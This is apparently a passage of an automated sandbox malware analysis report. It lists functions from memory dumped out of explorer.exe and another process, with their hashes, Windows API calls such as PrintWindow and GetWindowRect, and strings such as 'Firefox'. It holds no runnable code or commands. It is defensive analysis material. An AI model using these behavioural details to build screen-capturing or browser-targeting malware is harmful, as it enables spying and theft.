                                                                                                                                                                                                                                  • Opcode ID: 3d431951645bc05cb01c584ab524e85c753577a256068b6a56c3bb23de631370
                                                                                                                                                                                                                                  • Instruction ID: 7c032713c2faafcb793ceaff110937b5cc0bf183159e05155e5e761be138899c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d431951645bc05cb01c584ab524e85c753577a256068b6a56c3bb23de631370
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D016232601B41C1EB54DB36E84436D3361FBC8FA4F488135CA5A07758DF38D986C740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsWindowVisible.USER32 ref: 0F3D8C4F
                                                                                                                                                                                                                                    • Part of subcall function 0F3D99D0: GetWindowRect.USER32 ref: 0F3D99F8
                                                                                                                                                                                                                                    • Part of subcall function 0F3D99D0: CreateCompatibleDC.GDI32 ref: 0F3D9A01
                                                                                                                                                                                                                                    • Part of subcall function 0F3D99D0: CreateCompatibleBitmap.GDI32 ref: 0F3D9A1F
                                                                                                                                                                                                                                    • Part of subcall function 0F3D99D0: SelectObject.GDI32 ref: 0F3D9A2E
                                                                                                                                                                                                                                    • Part of subcall function 0F3D99D0: PrintWindow.USER32 ref: 0F3D9A3D
                                                                                                                                                                                                                                    • Part of subcall function 0F3D99D0: DeleteObject.GDI32 ref: 0F3D9A89
                                                                                                                                                                                                                                    • Part of subcall function 0F3D99D0: DeleteDC.GDI32 ref: 0F3D9A92
                                                                                                                                                                                                                                  • GetWindowLongA.USER32 ref: 0F3D8C70
                                                                                                                                                                                                                                  • SetWindowLongA.USER32 ref: 0F3D8C85
                                                                                                                                                                                                                                  • GetVersionExA.KERNEL32 ref: 0F3D8C98
                                                                                                                                                                                                                                    • Part of subcall function 0F3D8CD0: GetTopWindow.USER32 ref: 0F3D8CE5
                                                                                                                                                                                                                                    • Part of subcall function 0F3D8CD0: GetWindow.USER32 ref: 0F3D8D0E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$CompatibleCreateDeleteLongObject$BitmapPrintRectSelectVersionVisible
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 567582119-0
                                                                                                                                                                                                                                  • Opcode ID: c09e8f431026a883c3de20a9801f16b9959e239982204442eb7aeaec3bdd243d
                                                                                                                                                                                                                                  • Instruction ID: 71815ce8fc6086062e71bce29ae99bd884597f74d6ea605443f5769af8790974
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c09e8f431026a883c3de20a9801f16b9959e239982204442eb7aeaec3bdd243d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E018162701A42C2EB309B66F84476AB321F789BE4F484135EE5A47BA5CF3CD698C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ??3@CreateThread_malloc_dbglstrcpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3519057016-0
                                                                                                                                                                                                                                  • Opcode ID: 0ff5c5edc898e7c854b521c10a36106da95f7f5a2f03b0f825eb23a3efea4888
                                                                                                                                                                                                                                  • Instruction ID: 4dfce8fe2d2934c16d6facb6ff1c493987ed384abb8dd152d49cb9367fdfec13
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ff5c5edc898e7c854b521c10a36106da95f7f5a2f03b0f825eb23a3efea4888
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06F0A432A05B8183EB258B11F60437AA261F748BF4F488535EE4947B69DF3CC6858704
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ??3@$CriticalEnterSectionmemset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4090242730-0
                                                                                                                                                                                                                                  • Opcode ID: 82edf1b70ad49228e8aa7cfc154c632a148f26fb05a25e9d52645217873000f6
                                                                                                                                                                                                                                  • Instruction ID: b0b0f1fcf2f1fe9256e7344be7a144f6e87a916543806a1873c375a667632d1f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82edf1b70ad49228e8aa7cfc154c632a148f26fb05a25e9d52645217873000f6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7016272610A46D2EB259F25E8843B93371F788FA4F854432CA0A47934DF38C5D9D340
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: abort$_set_abort_behavior
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2064194629-0
                                                                                                                                                                                                                                  • Opcode ID: dc58f8c0e7bbf0cce20ba8cb0b632d3b999d5a2622377be11c7867a0c8efaa55
                                                                                                                                                                                                                                  • Instruction ID: e4adabd40004eb619cda2cb5882d85fc8dd4d1ff526ba0b51272b28d98fda638
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc58f8c0e7bbf0cce20ba8cb0b632d3b999d5a2622377be11c7867a0c8efaa55
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2F08278332B0986FE1867A0EC547582360FB44704F54CE15850D47B28FE3CD15D9F42
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _set_error_mode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1949149715-0
                                                                                                                                                                                                                                  • Opcode ID: a728608133e97f596589ad2e2f9e93d8d2c46a6cb7fed67bee0efa2cd8959fd4
                                                                                                                                                                                                                                  • Instruction ID: eefc8ccb6bc257b8476701a71180607d1ac2e057017446010962351f05878c9a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a728608133e97f596589ad2e2f9e93d8d2c46a6cb7fed67bee0efa2cd8959fd4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4D05E68F3121682FA3D3391457037A1105EB52304F448A3DC30549AC5F949C99D0E13
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 0C36F037
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritable
                                                                                                                                                                                                                                  • String ID: $csm
                                                                                                                                                                                                                                  • API String ID: 3104724169-717980254
                                                                                                                                                                                                                                  • Opcode ID: 3f094d6fcd6df7c79df031b4f2a61ff3beef2fca3ab7281f970d40d8a3288114
                                                                                                                                                                                                                                  • Instruction ID: a65dd5a564cc0d8feb26512051f0eb8eebdeb5b819cbc9a600a6cf74a353bd79
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f094d6fcd6df7c79df031b4f2a61ff3beef2fca3ab7281f970d40d8a3288114
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3518A363226408BCB14DF69F444BA877A6F348BD8F64C621DE8647B08EB75D886CB50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __crtCapturePreviousContext.LIBCMT ref: 0C375491
                                                                                                                                                                                                                                  • __raise_securityfailure.LIBCMT ref: 0C375533
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Complete Object Locator', xrefs: 0C37552C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CaptureContextPrevious__crt__raise_securityfailure
                                                                                                                                                                                                                                  • String ID: Complete Object Locator'
                                                                                                                                                                                                                                  • API String ID: 37250909-3230220348
                                                                                                                                                                                                                                  • Opcode ID: 90da94f41b87728ce8c421d02ed5f259416c229b2a16919387991320736c17e0
                                                                                                                                                                                                                                  • Instruction ID: 75a551c9f2eff656afd1d94bb5c3a172da0d477c85dd5e06017a130b787c499e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90da94f41b87728ce8c421d02ed5f259416c229b2a16919387991320736c17e0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC214675226B00C1FF909B19F85275977B4F384344F909326EA8D827A4EFBCC619CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::locale::_Locimp::_Locimp_dtor.LIBCPMT ref: 0C36AE19
                                                                                                                                                                                                                                    • Part of subcall function 0C36AF34: std::_Lockit::_Lockit.LIBCPMT ref: 0C36AF52
                                                                                                                                                                                                                                    • Part of subcall function 0C36AF34: free.LIBCMT ref: 0C36AF90
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0C36AE27
                                                                                                                                                                                                                                    • Part of subcall function 0C36C2E4: _errno.LIBCMT ref: 0C36C304
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • ror(error_complexity): The complexity of an attempted match against a regular expression exceeded a pre-set level., xrefs: 0C36AE31
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$Locimp::_Locimp_dtorLockitLockit::__errnostd::_std::locale::_
                                                                                                                                                                                                                                  • String ID: ror(error_complexity): The complexity of an attempted match against a regular expression exceeded a pre-set level.
                                                                                                                                                                                                                                  • API String ID: 257637515-3799310485
                                                                                                                                                                                                                                  • Opcode ID: 85757340480da28e00f2fde29b916a2feecb1c12a4bdf59558abf013eebd9474
                                                                                                                                                                                                                                  • Instruction ID: 933ba61f63ca402df51d213cd32f09af7ac06268cf6ea42c3ae632491ffa6262
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85757340480da28e00f2fde29b916a2feecb1c12a4bdf59558abf013eebd9474
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2F03932722B0081EF15DFA6F4907A963A4EB8CB94FA991219A4C47B18DF38C498CB51
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6FEC: ??3@YAXPEAX@Z.MSVCRT ref: 0F3C7040
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6FEC: ??3@YAXPEAX@Z.MSVCRT ref: 0F3C7049
                                                                                                                                                                                                                                    • Part of subcall function 0F3C7444: lstrlenA.KERNEL32 ref: 0F3C7478
                                                                                                                                                                                                                                    • Part of subcall function 0F3C7444: lstrlenA.KERNEL32 ref: 0F3C7485
                                                                                                                                                                                                                                    • Part of subcall function 0F3C7444: lstrlenA.KERNEL32 ref: 0F3C7490
                                                                                                                                                                                                                                    • Part of subcall function 0F3C7444: lstrlenA.KERNEL32 ref: 0F3C749B
                                                                                                                                                                                                                                    • Part of subcall function 0F3C7444: _malloc_dbg.MSVCRT ref: 0F3C74A9
                                                                                                                                                                                                                                    • Part of subcall function 0F3C7444: wsprintfA.USER32 ref: 0F3C74CB
                                                                                                                                                                                                                                    • Part of subcall function 0F3C7444: lstrcatA.KERNEL32 ref: 0F3C74D7
                                                                                                                                                                                                                                  • ??3@YAXPEAX@Z.MSVCRT ref: 0F3D8708
                                                                                                                                                                                                                                  • ??3@YAXPEAX@Z.MSVCRT ref: 0F3D8715
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ??3@lstrlen$_malloc_dbglstrcatwsprintf
                                                                                                                                                                                                                                  • String ID: Firefox
                                                                                                                                                                                                                                  • API String ID: 1282472873-3930541253
                                                                                                                                                                                                                                  • Opcode ID: 443c36165f1c6097550f90311bf0591eeeb820b6f4a49580b6ad4cc65bdd2471
                                                                                                                                                                                                                                  • Instruction ID: a0d56b9372cd502c64effcfc0ee0cbdeabbec8821e1136260afa395648cfd85e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 443c36165f1c6097550f90311bf0591eeeb820b6f4a49580b6ad4cc65bdd2471
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CE0ED61620A8782EA609B12F8547763325F798B95F052035DD1E0BB26DF3CC558D740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 0C36A704
                                                                                                                                                                                                                                    • Part of subcall function 0C36C678: std::exception::_Copy_str.LIBCMT ref: 0C36C697
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0C36A725
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                                  • String ID: sAlloc
                                                                                                                                                                                                                                  • API String ID: 1924332735-1594135104
                                                                                                                                                                                                                                  • Opcode ID: 9217aa22bd1210272f5a7a857eccb05bef9aadce28c2d3acd366c1dc70812c7e
                                                                                                                                                                                                                                  • Instruction ID: 4649494e5803c8aa5cf85bc7aea4a3e6eacef4f2d6fbd0012728732936885d9c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9217aa22bd1210272f5a7a857eccb05bef9aadce28c2d3acd366c1dc70812c7e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42E04F71624B8992DA20DB50F484789A764F398348F409615E2CD43B28EF7CC20DCF01
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 0C36A68B
                                                                                                                                                                                                                                    • Part of subcall function 0C36C678: std::exception::_Copy_str.LIBCMT ref: 0C36C697
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0C36A6A8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                                  • String ID: ceCounter
                                                                                                                                                                                                                                  • API String ID: 1924332735-2283763082
                                                                                                                                                                                                                                  • Opcode ID: d800f3934b662547b3ff2380a2fe71f645d64b3e9fe41d4f478a3787e21480e6
                                                                                                                                                                                                                                  • Instruction ID: 312fd98f3ae046a782072ea2932cce05e7d082040f6d82b416a932119a7e3946
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d800f3934b662547b3ff2380a2fe71f645d64b3e9fe41d4f478a3787e21480e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25D01221114B8A92DE24DB40F444389B364F795308F809612E2CC07E28EF7CC30DCF41
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                  • API String ID: 0-2852464175
                                                                                                                                                                                                                                  • Opcode ID: e9b9a482757eb873b7e2abbbfa05a66966b53d5778c129066dc84376f67d2b24
                                                                                                                                                                                                                                  • Instruction ID: 41c686ac609b29295cd334577fbae154b3fd2035510cc07bd843acc8e233c4b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9b9a482757eb873b7e2abbbfa05a66966b53d5778c129066dc84376f67d2b24
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E142C320F1994E4FE799FF788875BA9BBA1EF54340F4841BAD00DC76D7CD2869858740
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e9856fea844e050be664ff73b5637103dfb5bade535bdc26919a8719c57ffe19
                                                                                                                                                                                                                                  • Instruction ID: 3acbd4d2d903fc7cd5f8390d4d87910205a0e75c7983de4e43fb866c97440b2b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9856fea844e050be664ff73b5637103dfb5bade535bdc26919a8719c57ffe19
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57B26870E1991D8FDBA9EF58C8A9BA8B7B1FB58301F5041EAD00DE3651CA755E81CF00
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                  • API String ID: 0-2852464175
                                                                                                                                                                                                                                  • Opcode ID: 1ea18ba34b18fd78d95eb5fca8ef9b7922e4ea3ed67d3c0f154b082fa27e5b39
                                                                                                                                                                                                                                  • Instruction ID: 80a79cba8036f2d43bc87506990ab9a77c41ea6ceea941274527c043dbb7ed21
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ea18ba34b18fd78d95eb5fca8ef9b7922e4ea3ed67d3c0f154b082fa27e5b39
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C618021B1980A4FE7D5FBA888697BDB7D2EF88344F450179D01EC32EBDE286D418741
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: s<L_^
                                                                                                                                                                                                                                  • API String ID: 0-2202289036
                                                                                                                                                                                                                                  • Opcode ID: 826c73337c17ffaae72b6f9ea154d961e2a74136a192ff16c9d1acc07c34a33b
                                                                                                                                                                                                                                  • Instruction ID: 29784dbe71de4c8d2627f9d200e6d7f1cdeecf978be33e5b22f117ad86e51210
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 826c73337c17ffaae72b6f9ea154d961e2a74136a192ff16c9d1acc07c34a33b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D61FA93B0FAC90FF7A786F44875364AF50AF51304B4D00FBE498878E7C51AA949C352
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 3
                                                                                                                                                                                                                                  • API String ID: 0-1842515611
                                                                                                                                                                                                                                  • Opcode ID: 222232ba867945242741fdeffc8fbba523943975522d7bdaa07a7ba4d00a7103
                                                                                                                                                                                                                                  • Instruction ID: f19e6ede28d5508ebe6757b47fbf34f33f8d855116aef3b44be754aa4e353953
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 222232ba867945242741fdeffc8fbba523943975522d7bdaa07a7ba4d00a7103
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2419B71F0DE4D4FEB69EB1898626E9BBE1EF85350F14016ED09DC3197DD24A8028781
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: s<L_^
                                                                                                                                                                                                                                  • API String ID: 0-2202289036
                                                                                                                                                                                                                                  • Opcode ID: c8d5effe2d01dbc4e1b752b3f9cc439faa47758b50660ef64c9ddfd8b2258d7d
                                                                                                                                                                                                                                  • Instruction ID: 868d9295a15ed640adf2c51870888c521eff1e0da6c6ebeef55d6b4e5f06214e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8d5effe2d01dbc4e1b752b3f9cc439faa47758b50660ef64c9ddfd8b2258d7d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE410A93B0FAC90FF7A78AF44864365AF51AF45304B4D00BFF088869E7C61AAA49C351
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 3
                                                                                                                                                                                                                                  • API String ID: 0-1842515611
                                                                                                                                                                                                                                  • Opcode ID: cfc514397a5bbb07146abf7e1e349849811836b5a5f8b6a099bf008936498fa8
                                                                                                                                                                                                                                  • Instruction ID: 44493d6551c067f8914293edf7f2efb2b30b96044294ef1ccdc221573b66f9ca
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfc514397a5bbb07146abf7e1e349849811836b5a5f8b6a099bf008936498fa8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A315B71F1DD4D4BEB75EB1C54612ADBBE2EF99390F19026ED049C319BCD24A8028781
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6d4224da803e58799b7a7ee6bb433a03a155b71efd66f005b6bb075356b775b0
                                                                                                                                                                                                                                  • Instruction ID: e0f65e7da0a0d39cb75f588d72a540e811872a56ccccfab6de4d702a08c68ed7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d4224da803e58799b7a7ee6bb433a03a155b71efd66f005b6bb075356b775b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6E19E20B28A090BE795FB7D8869BBAB7D2FF88604F450579D54EC32E7DD2CAD418341
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3afd6842ae15a9f60f52fd8906fffbd85c008d25b3226cd95ef23684c29d0aa8
                                                                                                                                                                                                                                  • Instruction ID: 9ee3b15760e6fa1c5de3c01d4788de17f823bb72d2efe554ac0a9b716e57d0c2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3afd6842ae15a9f60f52fd8906fffbd85c008d25b3226cd95ef23684c29d0aa8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5914461B0EA8E0FE796BBA898757A9BBD1EF89350F0501BBE04DC71D3CD1C69468341
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c3ee8140fef875cacac12fca6999cd11a44607f1c3f3d2d1101f5fe77f503659
